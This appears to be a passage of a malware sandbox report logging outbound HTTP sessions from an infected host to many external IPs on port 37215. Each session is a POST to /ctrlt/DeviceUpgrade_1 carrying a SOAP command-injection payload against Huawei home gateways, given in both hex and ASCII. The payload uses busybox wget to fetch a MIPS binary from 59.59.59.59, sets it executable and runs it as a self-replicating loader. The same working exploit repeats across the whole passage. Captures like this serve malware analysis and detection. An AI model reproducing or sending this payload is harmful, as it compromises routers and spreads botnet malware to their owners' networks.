                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2187192.168.2.1549136197.120.115.25137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:25.139077902 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2188192.168.2.1556560157.245.1.23937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:25.149899006 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2189192.168.2.1540096149.230.117.13037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:25.154968023 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2190192.168.2.1546404135.40.41.21337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:25.160303116 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2191192.168.2.155537841.182.64.8737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:25.246036053 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2192192.168.2.1538350197.157.46.10037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:26.147185087 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2193192.168.2.153485041.33.237.3037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:26.147543907 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2194192.168.2.155818241.220.109.8037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:26.147574902 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2195192.168.2.1558436179.92.145.5737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:26.147608995 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2196192.168.2.155006441.225.130.25137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:26.152863979 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
